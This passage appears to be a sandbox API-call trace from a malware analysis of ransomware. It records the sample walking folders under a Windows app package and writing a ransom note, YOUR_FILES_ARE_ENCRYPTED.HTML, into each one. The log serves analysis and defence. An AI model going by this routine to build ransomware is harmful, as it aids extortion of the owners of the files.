dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 0 [0119.382] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.382] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0119.382] GetProcessHeap () returned 0x600000 [0119.382] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.383] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.384] CloseHandle (hObject=0x320) returned 1 [0119.384] GetProcessHeap () returned 0x600000 [0119.384] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.384] GetProcessHeap () returned 0x600000 [0119.384] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.385] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0119.385] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.385] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies") returned 112 [0119.385] GetProcessHeap () returned 0x600000 [0119.385] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.386] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies" [0119.386] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\*" [0119.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.386] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 1 [0119.386] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 0 [0119.386] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.386] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0119.386] GetProcessHeap () returned 0x600000 [0119.386] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.395] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.396] CloseHandle (hObject=0x320) returned 1 [0119.396] GetProcessHeap () returned 0x600000 [0119.396] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.396] GetProcessHeap () returned 0x600000 [0119.397] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.397] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0119.397] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.397] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory") returned 112 [0119.397] GetProcessHeap () returned 0x600000 [0119.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.397] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory" [0119.397] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\*" [0119.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0119.397] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 1 [0119.397] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd6b4d3, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd6b4d3, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 0 [0119.397] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.397] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0119.397] GetProcessHeap () returned 0x600000 [0119.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.398] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.399] CloseHandle (hObject=0x320) returned 1 [0119.399] GetProcessHeap () returned 0x600000 [0119.399] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.399] GetProcessHeap () returned 0x600000 [0119.399] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.399] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.399] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.399] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp") returned 105 [0119.399] GetProcessHeap () returned 0x600000 [0119.399] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.399] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp" [0119.400] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\*" [0119.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.400] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 1 [0119.400] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 0 [0119.400] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.400] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0119.400] GetProcessHeap () returned 0x600000 [0119.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.401] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.402] CloseHandle (hObject=0x320) returned 1 [0119.402] GetProcessHeap () returned 0x600000 [0119.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.402] GetProcessHeap () returned 0x600000 [0119.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.403] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="Temp", cAlternateFileName="")) returned 0 [0119.403] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.403] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0119.403] GetProcessHeap () returned 0x600000 [0119.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.404] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.405] CloseHandle (hObject=0x214) returned 1 [0119.405] GetProcessHeap () returned 0x600000 [0119.405] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.405] GetProcessHeap () returned 0x600000 [0119.405] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.405] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.405] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.405] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData") returned 105 [0119.405] GetProcessHeap () returned 0x600000 [0119.405] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.405] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData" [0119.405] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\*" [0119.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0119.406] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.406] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 0 [0119.406] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0119.406] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0119.406] GetProcessHeap () returned 0x600000 [0119.406] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.407] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.408] CloseHandle (hObject=0x214) returned 1 [0119.409] GetProcessHeap () returned 0x600000 [0119.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 